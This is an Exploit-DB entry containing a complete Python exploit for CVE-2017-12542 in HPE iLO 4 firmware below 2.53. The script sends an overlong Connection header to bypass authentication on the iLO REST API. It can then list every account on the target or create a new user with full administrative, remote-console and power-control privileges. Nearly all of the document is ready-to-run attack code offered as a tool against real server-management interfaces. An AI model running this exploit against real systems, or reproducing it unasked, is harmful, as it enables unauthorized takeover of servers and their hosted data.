HPE iLO 4 < 2.53 - Add New Administrator User

EDB-ID:

44005


Author:

skelsec

Type:

remote


Platform:

Multiple

Date:

2018-02-05


#!/usr/bin/env python

"""
Exploit trigger was presented @reconbrx 2018

Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html

Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222

IMPORTANT: 
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.


"""

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3

#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'



def test(ip):
	
	url = accounts_url % ip
	try:
		response = requests.get(url, headers = exploit_trigger, verify = False)
	except Exception as e:
		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

	try:
		data = json.loads(response.text)
	except Exception as e:
		return False, 'Target response not as exected!, Exception data: %s' % (str(e),)

	return True, data

def exploit(ip, username, password):
	Oem = {
		'Hp' : {
			'LoginName' : username,
			'Privileges': {
				'LoginPriv' : True,
				'RemoteConsolePriv': True,
				'UserConfigPriv' : True,
				'VirtualMediaPriv': True,
				'iLOConfigPriv':True,
				'VirtualPowerAndResetPriv':True,
			}
		}
	}
	body = {
		'UserName':username,
		'Password':password,
		'Oem':Oem
	}
	url = accounts_url % ip



	try:
		response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
	except Exception as e:
		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

	if response.status_code in [requests.codes.ok, requests.codes.created]:
		return True, response.text
	else:
		return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)

if __name__ == '__main__':
	import argparse
	import sys
	parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
	parser.add_argument('ip', help='target IP')
	parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
	parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
	parser.add_argument('-u', help='username of the new admin user')
	parser.add_argument('-p', help='password of the new admin user')

	args = parser.parse_args()

	if args.e:
		if args.u is None or args.p is None:
			print('Username and password must be set for exploiting!')
			sys.exit()
		res, data = exploit(args.ip, args.u, args.p)
		if res:
			print('[+] Sucsessfully added user!')
		else:
			print('[-] Error! %s' % data)

	elif args.t:
		res, data = test(args.ip)
		if res:
			print('[+] Target is VULNERABLE!')
			for i in data['Items']:
				print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
		else:
			print('[-] Error! %s' % data)